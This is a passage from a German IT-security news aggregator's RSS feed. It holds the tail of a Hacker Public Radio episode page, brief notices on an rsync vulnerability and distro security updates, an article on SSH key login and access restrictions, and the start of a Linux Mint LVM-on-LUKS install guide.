Unless otherwise stated, today’s show is released under a <a href="https://creativecommons.org/licenses/by-sa/4.0/" rel="noopener noreferrer" target="_blank">
Creative Commons Attribution-ShareAlike 4.0 International (CC BY-SA 4.0)</a>
 license.</p>
<p>
<br>
</p>
<h1>
Discussions about the HPR Theme</h1>
<ul>
<li>
<a href="https://hackerpublicradio.org/eps/hpr3837/index.html#comments" rel="noopener noreferrer" target="_blank">
2023-04 intro</a>
</li>
<li>
<a href="https://hackerpublicradio.org/eps/hpr3553/index.html#comment_3378" rel="noopener noreferrer" target="_blank">
2022-03 Great Intro</a>
</li>
<li>
<a href="https://hackerpublicradio.org/eps/hpr3461/index.html#comment_3306" rel="noopener noreferrer" target="_blank">
2022-03 TTS</a>
</li>
<li>
<a href="https://hackerpublicradio.org/eps/hpr3461/index.html#comment_3377" rel="noopener noreferrer" target="_blank">
2022-03 The TTS voice</a>
</li>
<li>
<a href="https://lists.hackerpublicradio.com/pipermail/hpr/2021-November/004327.html" rel="noopener noreferrer" target="_blank">
2021-11 Theme - was “Possible cause and solution to subscriber attrition(trying again without encryption)”</a>
</li>
<li>
<a href="https://hackerpublicradio.org/eps/hpr3139/index.html#comment_3007" rel="noopener noreferrer" target="_blank">
2020-08 the voice</a>
</li>
<li>
<a href="https://hackerpublicradio.org/eps/hpr2936/index.html#comment_2799" rel="noopener noreferrer" target="_blank">
2019-11 Ken’s Voice Is Better Than espeak</a>
</li>
<li>
<a href="https://lists.hackerpublicradio.com/pipermail/hpr/2018-September/003541.html" rel="noopener noreferrer" target="_blank">
2018-09 HPR Branding</a>
</li>
<li>
<a href="https://hackerpublicradio.org/eps/hpr2625/index.html#comment_2493" rel="noopener noreferrer" target="_blank">
2018-09 Accordion outro</a>
</li>
<li>
<a href="https://hackerpublicradio.org/eps/hpr2651/index.html#comment_2515" rel="noopener noreferrer" target="_blank">
2018-10 Intro volume</a>
</li>
<li>
<a href="https://hackerpublicradio.org/eps/hpr2651/index.html#comment_2517" rel="noopener noreferrer" target="_blank">
2018-10 TTS over intro music</a>
</li>
<li>
<a href="https://lists.hackerpublicradio.com/pipermail/hpr/2016-February/002881.html" rel="noopener noreferrer" target="_blank">
2016-02 speech synthesis during intro</a>
</li>
<li>
<a href="https://lists.hackerpublicradio.com/pipermail/hpr/2015-December/002795.html" rel="noopener noreferrer" target="_blank">
2015-12 How to check if the intro and outro are added</a>
</li>
<li>
<a href="https://lists.hackerpublicradio.com/pipermail/hpr/2015-February/002515.html" rel="noopener noreferrer" target="_blank">
2015-02 Intro and Outro</a>
</li>
<li>
<a href="https://lists.hackerpublicradio.com/pipermail/hpr/2014-December/002410.html" rel="noopener noreferrer" target="_blank">
2014-12 Outro Theme</a>
</li>
<li>
<a href="https://lists.hackerpublicradio.com/pipermail/hpr/2014-December/002399.html" rel="noopener noreferrer" target="_blank">
2014-12 Bug Fix HPR Intros</a>
</li>
<li>
<a href="https://hackerpublicradio.org/eps/hpr1642/index.html#comment_991" rel="noopener noreferrer" target="_blank">
2014-11 MaryTTS, clipping</a>
</li>
<li>
<a href="https://lists.hackerpublicradio.com/pipermail/hpr/2014-November/002312.html" rel="noopener noreferrer" target="_blank">
2014-11 An HPR Theme Question, And First Time Member</a>
</li>
<li>
2014-02 What’s the word on intro and outro clips?https://lists.hackerpublicradio.com/pipermail/hpr/2014-September/002266.html</li>
<li>
<a href="https://lists.hackerpublicradio.com/pipermail/hpr/2011-September/000455.html" rel="noopener noreferrer" target="_blank">
2011-09 HPR Theme</a>
</li>
<li>
<a href="https://lists.hackerpublicradio.com/pipermail/hpr/2009-June/000084.html" rel="noopener noreferrer" target="_blank">
2009-06 my eps for HPR and intro</a>
</li>
</ul>
<p>
<br>
</p>


<p><a href="https://hackerpublicradio.org/eps/hpr4538/index.html#comments">Provide <strong>feedback</strong> on this episode</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[IT-Sicherheit: Linux und UNIX bedroht - IT-Sicherheitslücke bei Rsync mit hohem Risiko ...]]></title>
<description><![CDATA[... Server, Oracle Linux, Gentoo Linux, Open Source Arch Linux, RESF Rocky Linux, Dell NetWorker, Dell Avamar, Open Source Rsync, HAProxy HAProxy ...]]></description>
<link>https://tsecurity.de/de/3176603/unix-server/it-sicherheit-linux-und-unix-bedroht-it-sicherheitsluecke-bei-rsync-mit-hohem-risiko/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3176603/unix-server/it-sicherheit-linux-und-unix-bedroht-it-sicherheitsluecke-bei-rsync-mit-hohem-risiko/</guid>
<pubDate>Tue, 23 Dec 2025 19:16:12 +0100</pubDate>
<category>🐧 Unix Server</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[... <b>Server</b>, Oracle Linux, Gentoo Linux, Open Source Arch Linux, RESF Rocky Linux, Dell NetWorker, Dell Avamar, Open Source Rsync, HAProxy HAProxy ...]]></content:encoded>
</item>
<item>
<title><![CDATA[Security: Überschreiben von Dateien in rsync (Red Hat)]]></title>
<description><![CDATA[]]></description>
<link>https://tsecurity.de/de/3175289/unix-server/security-ueberschreiben-von-dateien-in-rsync-red-hat/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3175289/unix-server/security-ueberschreiben-von-dateien-in-rsync-red-hat/</guid>
<pubDate>Tue, 23 Dec 2025 07:06:47 +0100</pubDate>
<category>🐧 Unix Server</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[ ]]></content:encoded>
</item>
<item>
<title><![CDATA[Security: Überschreiben von Dateien in rsync (Red Hat)]]></title>
<description><![CDATA[]]></description>
<link>https://tsecurity.de/de/3175287/unix-server/security-ueberschreiben-von-dateien-in-rsync-red-hat/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3175287/unix-server/security-ueberschreiben-von-dateien-in-rsync-red-hat/</guid>
<pubDate>Tue, 23 Dec 2025 07:06:43 +0100</pubDate>
<category>🐧 Unix Server</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[ ]]></content:encoded>
</item>
<item>
<title><![CDATA[Security: Überschreiben von Dateien in rsync (Red Hat)]]></title>
<description><![CDATA[]]></description>
<link>https://tsecurity.de/de/3175286/unix-server/security-ueberschreiben-von-dateien-in-rsync-red-hat/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3175286/unix-server/security-ueberschreiben-von-dateien-in-rsync-red-hat/</guid>
<pubDate>Tue, 23 Dec 2025 07:06:41 +0100</pubDate>
<category>🐧 Unix Server</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[ ]]></content:encoded>
</item>
<item>
<title><![CDATA[Security: Überschreiben von Dateien in rsync (Red Hat)]]></title>
<description><![CDATA[]]></description>
<link>https://tsecurity.de/de/3175284/unix-server/security-ueberschreiben-von-dateien-in-rsync-red-hat/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3175284/unix-server/security-ueberschreiben-von-dateien-in-rsync-red-hat/</guid>
<pubDate>Tue, 23 Dec 2025 07:06:38 +0100</pubDate>
<category>🐧 Unix Server</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[ ]]></content:encoded>
</item>
<item>
<title><![CDATA[Security updates for Monday]]></title>
<description><![CDATA[Security updates have been issued by Debian (chromium, dropbear, mediawiki, php8.4, python-mechanize, rails, roundcube, usbmuxd, and wordpress), Fedora (cef, chromium, fonttools, gobuster, gosec, mingw-libpng, moby-engine, mqttcli, nextcloud, pgadmin4, python-unicodedata2, uriparser, and util-lin...]]></description>
<link>https://tsecurity.de/de/3174217/linux-tipps/security-updates-for-monday/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3174217/linux-tipps/security-updates-for-monday/</guid>
<pubDate>Mon, 22 Dec 2025 15:06:39 +0100</pubDate>
<category>🐧 Linux Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Security updates have been issued by <b>Debian</b> (chromium, dropbear, mediawiki, php8.4, python-mechanize, rails, roundcube, usbmuxd, and wordpress), <b>Fedora</b> (cef, chromium, fonttools, gobuster, gosec, mingw-libpng, moby-engine, mqttcli, nextcloud, pgadmin4, python-unicodedata2, uriparser, and util-linux), <b>Mageia</b> (php and webkit2), <b>Oracle</b> (binutils, curl, gcc-toolset-13-binutils, gimp, git-lfs, kernel, openssh, php:8.3, podman, python-kdcproxy, python3.12, python3.9, skopeo, and webkit2gtk3), <b>Red Hat</b> (rsync), <b>Slackware</b> (php), <b>SUSE</b> (alloy, busybox, chromedriver, chromium, coredns-for-k8s, duc, firefox, kernel-devel, libpng16, libruby3_4-3_4, mariadb, netty, php8, python311-tornado6, rsync, taglib, and xen), and <b>Ubuntu</b> (linux-oracle-5.4, linux-raspi, linux-realtime-6.14, and linux-xilinx).]]></content:encoded>
</item>
<item>
<title><![CDATA[Überschreiben von Dateien in rsync (Red Hat)]]></title>
<description><![CDATA[]]></description>
<link>https://tsecurity.de/de/3163895/it-security-nachrichten/ueberschreiben-von-dateien-in-rsync-red-hat/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3163895/it-security-nachrichten/ueberschreiben-von-dateien-in-rsync-red-hat/</guid>
<pubDate>Wed, 17 Dec 2025 09:07:04 +0100</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
</item>
<item>
<title><![CDATA[Überschreiben von Dateien in rsync (Red Hat)]]></title>
<description><![CDATA[]]></description>
<link>https://tsecurity.de/de/3163894/it-security-nachrichten/ueberschreiben-von-dateien-in-rsync-red-hat/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3163894/it-security-nachrichten/ueberschreiben-von-dateien-in-rsync-red-hat/</guid>
<pubDate>Wed, 17 Dec 2025 09:07:03 +0100</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
</item>
<item>
<title><![CDATA[Security: Überschreiben von Dateien in rsync (Red Hat)]]></title>
<description><![CDATA[]]></description>
<link>https://tsecurity.de/de/3163877/unix-server/security-ueberschreiben-von-dateien-in-rsync-red-hat/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3163877/unix-server/security-ueberschreiben-von-dateien-in-rsync-red-hat/</guid>
<pubDate>Wed, 17 Dec 2025 09:01:19 +0100</pubDate>
<category>🐧 Unix Server</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[ ]]></content:encoded>
</item>
<item>
<title><![CDATA[Security updates for Tuesday]]></title>
<description><![CDATA[Security updates have been issued by Debian (binwalk, glib2.0, libgd2, paramiko, and python-apt), Fedora (chromium, python3.13, python3.14, qt6-qtdeclarative, and usd), Mageia (ffmpeg, firefox, nspr, nss, and thunderbird), Oracle (kernel, mysql, mysql:8.0, mysql:8.4, ruby:3.3, wireshark, and xorg...]]></description>
<link>https://tsecurity.de/de/3162445/linux-tipps/security-updates-for-tuesday/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3162445/linux-tipps/security-updates-for-tuesday/</guid>
<pubDate>Tue, 16 Dec 2025 15:23:19 +0100</pubDate>
<category>🐧 Linux Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Security updates have been issued by <b>Debian</b> (binwalk, glib2.0, libgd2, paramiko, and python-apt), <b>Fedora</b> (chromium, python3.13, python3.14, qt6-qtdeclarative, and usd), <b>Mageia</b> (ffmpeg, firefox, nspr, nss, and thunderbird), <b>Oracle</b> (kernel, mysql, mysql:8.0, mysql:8.4, ruby:3.3, wireshark, and xorg-x11-server), <b>Red Hat</b> (expat, mingw-expat, and rsync), <b>SUSE</b> (binutils, curl, glib2, gnutls, go1.24, go1.25, keylime, libmicrohttpd, libssh, openexr, postgresql15, python311, and xkbcomp), and <b>Ubuntu</b> (libsoup3, linux, linux-aws, linux-aws-6.8, linux-gcp, linux-gcp-6.8, linux-gke,
 linux-gkeop, linux-hwe-6.8, linux-ibm, linux-ibm-6.8, linux-lowlatency,
 linux-lowlatency-hwe-6.8, linux-nvidia, linux-nvidia-6.8,
 linux-nvidia-lowlatency, linux-oracle, linux-oracle-6.8, linux, linux-aws, linux-kvm, linux-lts-xenial, linux-azure, linux-azure-6.14, linux-azure, linux-azure-6.8, linux-azure-fips, linux-fips, linux-fips, linux-aws-fips, linux-gcp-fips, linux-kvm, linux-oem-6.14, linux-raspi, and linux-realtime, linux-realtime-6.8).]]></content:encoded>
</item>
<item>
<title><![CDATA[Security: Überschreiben von Dateien in rsync (Red Hat)]]></title>
<description><![CDATA[]]></description>
<link>https://tsecurity.de/de/3160916/unix-server/security-ueberschreiben-von-dateien-in-rsync-red-hat/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3160916/unix-server/security-ueberschreiben-von-dateien-in-rsync-red-hat/</guid>
<pubDate>Mon, 15 Dec 2025 22:15:55 +0100</pubDate>
<category>🐧 Unix Server</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[ ]]></content:encoded>
</item>
<item>
<title><![CDATA[SSH optimieren: Das sollte man bei der Fernwartung beachten]]></title>
<description><![CDATA[Jeder Server-Administrator kennt SSH und das dazugehörige Paket „openssh-server“. Der Nutzwert steht außer Frage. Die folgenden Tipps erklären einige Optionen, die nicht offensichtlich auf der Hand liegen und den Servereinsatz optimieren.



SSH-Verbindungen einhängen



SSH hat sein eigenes Date...]]></description>
<link>https://tsecurity.de/de/3142245/windows-tipps/ssh-optimieren-das-sollte-man-bei-der-fernwartung-beachten/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3142245/windows-tipps/ssh-optimieren-das-sollte-man-bei-der-fernwartung-beachten/</guid>
<pubDate>Sat, 06 Dec 2025 08:37:51 +0100</pubDate>
<category>🪟 Windows Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>Jeder Server-Administrator kennt SSH und das dazugehörige Paket „openssh-server“. Der Nutzwert steht außer Frage. Die folgenden Tipps erklären einige Optionen, die nicht offensichtlich auf der Hand liegen und den Servereinsatz optimieren.</p>



<h2 class="wp-block-heading toc">SSH-Verbindungen einhängen</h2>



<p>SSH hat sein eigenes Dateiprotokoll SFTP, das alle erwachsenen Linux-Dateimanager (Nautilus, Dolphin, Nemo, Thunar und andere) beherrschen: Mit der Syntax</p>



<pre class="wp-block-code"><code>sftp://sepp@192.168.178.10:22/srv/Data/</code></pre>



<p>in der Adresszeile eines Dateimanagers (Strg-L) haben Sie – nach Kennworteingabe – umstandslos die Dateien des entfernten SSH-Servers vor sich. </p>



<p>Die Adresseingabe scheint äußerst umständlich, allerdings können die Portangabe (22) und das Zielverzeichnis entfallen, falls Standardport 22 genutzt wird und das gesamte Dateisystem angezeigt werden soll:</p>



<pre class="wp-block-code"><code>sftp://sepp@192.168.178.10</code></pre>



<p>Solche Adresseingabe wird aber komplett entbehrlich, sobald Sie die Verbindung je nach Dateimanager per Drag &amp; Drop oder über die Option „Lesezeichen“ in der Navigation ablegen. Dann genügt künftig ein Mausklick.</p>



<p>Dieser komfortable Weg über den Dateimanager eignet sich multifunktional – zum Abspielen von Musik- oder Filmmedien ebenso wie für Datensicherungen oder zum Editieren von Konfigurationsdateien.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"6933dd34a8254"}' data-wp-interactive="core/image" class="wp-block-image size-full wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2025/11/ssh_optimieren_1.jpg?quality=50&amp;strip=all" alt="Datenzugriff und Mediennutzung per SFTP: Praktisch alle grafischen Linux-Dateimanager sprechen das Datenprotokoll SFTP und bieten damit die Daten eines SSH-Servers." class="wp-image-2978776" srcset="https://b2c-contenthub.com/wp-content/uploads/2025/11/ssh_optimieren_1.jpg?quality=50&amp;strip=all 800w, https://b2c-contenthub.com/wp-content/uploads/2025/11/ssh_optimieren_1.jpg?resize=300%2C178&amp;quality=50&amp;strip=all 300w, https://b2c-contenthub.com/wp-content/uploads/2025/11/ssh_optimieren_1.jpg?resize=768%2C456&amp;quality=50&amp;strip=all 768w" width="800" height="475" sizes="auto, (max-width: 800px) 100vw, 800px" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button><figcaption class="wp-element-caption"><p>Datenzugriff und Mediennutzung per SFTP: Praktisch alle grafischen Linux-Dateimanager sprechen das Datenprotokoll SFTP und bieten damit die Daten eines SSH-Servers.</p>
</figcaption></figure><p class="imageCredit">Foundry</p></div>



<p>Es gibt aber Situationen, wo die Netzwerkkompetenz grafischer Dateimanager nicht hilft. Wenn der SSH-Client selbst ein terminaladministrierter SSH-Server ist, gibt es keinen grafischen Dateimanager. </p>



<p>Ebenso kann es sein, dass auf einem grafischen Desktop ein Terminalplayer wie <strong>moc </strong>(„Music on Console“) bevorzugt wird. Um Dateien auf einem SSH-Server so zu öffnen, als lägen sie auf der lokalen Festplatte, eignet sich das winzige Tool sshfs. Unter Ubuntu &amp; Co. installieren Sie das Tool mit </p>



<pre class="wp-block-code"><code>sudo apt install sshfs</code></pre>



<p>und können dann mit einem Terminalbefehl (Beispiel)</p>



<pre class="wp-block-code"><code>sshfs sepp@192.168.178.10:/srv/Archiv ~/Archiv/</code></pre>



<p>beliebige Verzeichnisse des SSH-Servers im Home-Verzeichnis zugänglich machen. Der Zielordner („~/Archiv“) muss existieren.</p>



<h2 class="wp-block-heading toc">SSH-Anmeldung: Schlüssel statt Kennwort</h2>



<p>Komfort und Sicherheit sind normalerweise indirekt proportional: Mehr Komfort bedeutet fast immer geringere Sicherheit.</p>



<p>Die SSH-Anmeldung per Schlüssel ist eine Ausnahme. Der Zugang wird ohne Kennworteingabe deutlich bequemer und obendrein sicherer. Damit ist die Schlüsselmethode sowohl für öffentlich erreichbare Server (höhere Sicherheit) als auch für Homeserver mit geringem Sicherheitsanspruch uneingeschränkt zu empfehlen (einfacher Zutritt).</p>



<p>Mit folgendem Befehl erstellen Sie den Schlüssel auf allen Linux-PCs, die auf den SSH-Server zugreifen sollen:</p>



<pre class="wp-block-code"><code>ssh-keygen</code></pre>



<p>Dieser Befehl wird gerne komplizierter vorgeschlagen – mit Angabe der Verschlüsselungsmethode („-t) und Schlüssellänge („-b“). Nötig ist das nicht, zumal der hier genutzte Standard (ED25519) als sicherer gilt als das oft empfohlene RSA. Bestätigen Sie alle Abfragen des Befehls einfach durch Eingabetaste.</p>



<p>Damit entstehen im Home-Verzeichnis des aktuellen Benutzers unter „~/.ssh“ die zwei Dateien „id_ed25519“ und „id_ed25519.pub“ (der private und der öffentliche Schlüssel der asymmetrischen Verschlüsselung).</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"6933dd34a8be4"}' data-wp-interactive="core/image" class="wp-block-image size-full wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2025/11/ssh_optimieren_2.jpg?quality=50&amp;strip=all" alt="Bequemer und sicherer mit Schlüsselanmeldung. Die hier generierte öffentliche Schlüssel muss anschließend aus der „*.pub“-Datei zum SSH-Server übertragen werden." class="wp-image-2978786" srcset="https://b2c-contenthub.com/wp-content/uploads/2025/11/ssh_optimieren_2.jpg?quality=50&amp;strip=all 934w, https://b2c-contenthub.com/wp-content/uploads/2025/11/ssh_optimieren_2.jpg?resize=300%2C181&amp;quality=50&amp;strip=all 300w, https://b2c-contenthub.com/wp-content/uploads/2025/11/ssh_optimieren_2.jpg?resize=768%2C465&amp;quality=50&amp;strip=all 768w" width="934" height="565" sizes="auto, (max-width: 934px) 100vw, 934px" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button><figcaption class="wp-element-caption"><p>Bequemer und sicherer mit Schlüsselanmeldung. Die hier generierte öffentliche Schlüssel muss anschließend aus der „*.pub“-Datei zum SSH-Server übertragen werden.</p>
</figcaption></figure><p class="imageCredit">Foundry</p></div>



<p>Der öffentliche Schlüssel in der Datei mit der Erweiterung „.pub“ muss nun noch zum SSH-Server transportiert werden, und zwar unter dem Konto, mit dem man sich künftig anmelden will. Das ließe sich auch manuell erledigen, wird aber mit diesem speziellen Befehl vereinfacht (Beispiel):</p>



<pre class="wp-block-code"><code>ssh-copy-id -i ~/.ssh/id_ed25519.pub sepp@192.168.178.10</code></pre>



<p>Mit Parameter „-i“ müssen Sie die lokale, vorher erstellte, öffentliche Schlüsseldatei angeben. Der eigentliche Schlüssel landet dann auf dem Server im angegebenen Konto unter „~/.ssh/authorized_keys“ und ab sofort ist die Anmeldung mit (Beispiel)</p>



<pre class="wp-block-code"><code>ssh sepp@192.168.178.10</code></pre>



<p>ohne Passwort möglich. Das ist nicht nur bequemer, sondern bietet zusätzliche Vorteile: Sie können etwa automatische Rsync-Sicherungen per Cronjob einrichten oder Software auf dem Server mit</p>



<pre class="wp-block-code"><code>ssh -X sepp@192.168.178.10 synaptic</code></pre>



<p>ohne Passworteingabe direkt auf dem Server starten und sich auf dem Rechner anzeigen lassen, vor dem Sie sitzen.</p>



<h2 class="wp-block-heading toc">Konten oder IP-Adressen ausschließen</h2>



<p>Standardmäßig erlaubt SSH allen auf dem System vorhandenen Konten den Zugang. Das kann selbst auf einem unkritischen lokalen Heimserver zu großzügig sein, zumal jeder Samba-Berechtigte in der Regel mit demselben Kennwort auch das SSH-Terminal erreichen kann. </p>



<p>Der SSH-Server bietet aber mehrere Optionen, um Konten oder auch Geräte vom Zugriff auszuschließen. Der Weg führt in die zentrale Konfigurationsdatei „/etc/ssh/sshd_config“.</p>



<p>Eine erste Möglichkeit ist es, bestimmte Konten (des Servers) zu verbieten. Der Konfigurationseintrag dafür lautet „DenyUsers“ an beliebiger Stelle der Datei:</p>



<pre class="wp-block-code"><code>DenyUsers anna berta claus</code></pre>



<p>Meistens ist es aber einfacher, den umgekehrten Weg zu gehen und mit „AllowUsers“ von vornherein nur eines oder wenige SSH-berechtigte Konten zu definieren:</p>



<pre class="wp-block-code"><code>AllowUsers sepp</code></pre>



<p>Dies schließt alle anderen aus und erlaubt nur noch genau diesem Systemkonto die SSH-Anmeldung. Das angegebene Konto muss auf dem Server unbedingt existieren, andernfalls wäre der SSH-Zugang versperrt und der Fehler nur noch am lokalen System zu korrigieren. </p>



<p>Wenn nur ein Konto erlaubt ist, sollte dieses<strong> sudo-Recht</strong> besitzen, damit es die Serververwaltung übernehmen kann. </p>



<p>Für „AllowUsers“ gibt es zusätzlich einen interessanten IP-Filter: Folgende Anweisung erlaubt die SSH-Anmeldung eines einzigen Kontos nur noch von einer einzigen IP-Adresse (einem Gerät):</p>



<pre class="wp-block-code"><code>AllowUsers sepp@192.168.178.5</code></pre>



<p>Das Konto „sepp“ bezieht sich wie immer bei SSH auf ein Systemkonto auf dem SSH-Server. Die IP-Adresse ist hingegen diejenige eines zugreifenden Clients. Etwas offener wäre folgende Anweisung in der „/etc/ ssh/sshd_config“ (eine Zeile!):</p>



<pre class="wp-block-code"><code>AllowUsers *@192.168.178.2 sepp@192.168.178.5 sepp@192.168.178.8</code></pre>



<p>Von der IP „2“ des Adressraums (der Admin- Rechner?) darf sich jedes Konto anmelden, das Konto „sepp“ außerdem von den Geräten mit IP „5“ und „8“.</p>



<h2 class="wp-block-heading toc">Konfigurationsänderungen, Test und Neustart</h2>



<p>Änderungen an der SSH-Konfiguration werden erst dann eingelesen und gültig, nachdem der Dienst mit</p>



<pre class="wp-block-code"><code>sudo systemctl restart ssh</code></pre>



<p>neu gestartet wird. Dabei darf nichts schiefgehen. Fehler führen schlimmstenfalls dazu, dass der SSH-Dienst anschließend nicht mehr läuft und alle ausgesperrt sind. Vor dem Neustart des SSH-Dienstes empfiehlt sich daher mit</p>



<pre class="wp-block-code"><code>sudo sshd -t</code></pre>



<p>ein Test der Syntax der Datei „/etc/ssh/sshd_config“. Sollte die Datei Fehler enthalten, dann werden die Zeilennummer und die fehlerhafte Anweisung angezeigt. Dies schützt allerdings nur vor Tippfehlern und falsch geschriebenen Anweisungen.</p>



<p>Wer sich durch fehlerhafte „AllowUsers“- oder „DenyUsers“-Zeilen oder durch erzwungene Schlüsselanmeldung (ohne erfolgten Schlüsselaustausch) ausschließt, kann das dann nicht mehr per SSH-Fernzugriff, sondern nur noch am lokalen SSH-Serversystem korrigieren.</p>

</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[HPR4524: Living the Tux Life Episode 3 - Automating the Install]]></title>
<description><![CDATA[This show has been flagged as Clean by the host.






Setting up Linux Mint with Custom LVM and Luks


Linux Mint with Custom LVM on LUKS
Overview
The current Linux Mint installer doesn't support custom partitions when setting up a new machine with LUKS encryption using LVM. I prefer having a se...]]></description>
<link>https://tsecurity.de/de/3137239/podcasts/hpr4524-living-the-tux-life-episode-3-automating-the-install/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3137239/podcasts/hpr4524-living-the-tux-life-episode-3-automating-the-install/</guid>
<pubDate>Thu, 04 Dec 2025 01:02:09 +0100</pubDate>
<category>🎥 Podcasts</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>This show has been flagged as Clean by the host.</p>

<p>
<br>
</p>
<p>
<a href="https://code.christman.uk/Linux/linux%20-mint-with-custom-lvm-on-luks" rel="noopener noreferrer" target="_blank">
Setting up Linux Mint with Custom LVM and Luks</a>
</p>

<h1>Linux Mint with Custom LVM on LUKS</h1>
<h2>Overview</h2>
<p>The current Linux Mint installer doesn't support custom partitions when setting up a new machine with LUKS encryption using LVM. I prefer having a separate partition for my home directory and a backup partition for Timeshift, so that reinstalling or fixing issues won't overwrite my home directory. </p>
<p>I found several approaches to achieve this. One method involves setting up partitions first and then using the installer to select them, but this requires extensive post-installation configuration to get boot working with the encrypted drive. </p>
<p>I discovered this <a href="https://www.dwarmstrong.org/rearrange-lvm-after-mint-install/">blog</a> which explains how to repartition your drive after installation. Combined with my guide on setting up hibernation, I created this documentation to help remember how to install a fresh copy of Linux Mint with LVM and LUKS.</p>
<p><strong>Tested on:</strong> Linux Mint 22 Cinnamon</p>
<h2>Partition Layout</h2>
<p>For this guide, I'm working with a 1TB drive that will be split into the following logical volumes:</p>
<ul>
<li><strong>Root</strong> - 100GB (system files and applications)</li>
<li><strong>Swap</strong> - 32GB (for hibernation support)</li>
<li><strong>Home</strong> - 700GB (user files and documents)</li>
<li><strong>Backup</strong> - 100GB (Timeshift snapshots)</li>
<li><strong>Unallocated</strong> - ~68GB (reserved for future expansion)</li>
</ul>
<p>This setup ensures that system snapshots and user data remain separate, making system recovery much easier.</p>
<h2>Installation Guide</h2>
<h3>Step 1: Initial Linux Mint Installation</h3>
<p>Start the Linux Mint installation process as normal:</p>
<ol>
<li>Boot from your Linux Mint installation media</li>
<li>Follow the installation wizard (language, keyboard layout, etc.)</li>
<li>When you reach the <strong>Installation type</strong> screen:<ul>
<li>Select <strong>"Erase disk and install Linux Mint"</strong></li>
<li>Click <strong>"Advanced features"</strong></li>
<li>Enable both options:<ul>
<li>✓ <strong>Use LVM with the new Linux Mint installation</strong></li>
<li>✓ <strong>Encrypt the new Linux Mint installation for security</strong></li>
</ul>
</li>
<li>Click <strong>Continue</strong></li>
</ul>
</li>
<li>Enter a strong encryption password when prompted</li>
<li>Complete the rest of the installation (timezone, user account, etc.)</li>
<li>When installation finishes, <strong>do NOT click "Restart Now"</strong> - we'll repartition first</li>
</ol>
<p><strong>Important:</strong> Do NOT reboot after installation completes. We need to repartition before the first boot.</p>
<h3>Step 2: Access Root Terminal</h3>
<p>After installation finishes, open a terminal and switch to root:</p>
<pre><code class="lang-bash"><span class="hljs-attribute">sudo -i</span>
</code></pre>
<p>This gives you administrative privileges needed for disk operations.</p>
<h3>Step 3: Check Current Disk Layout</h3>
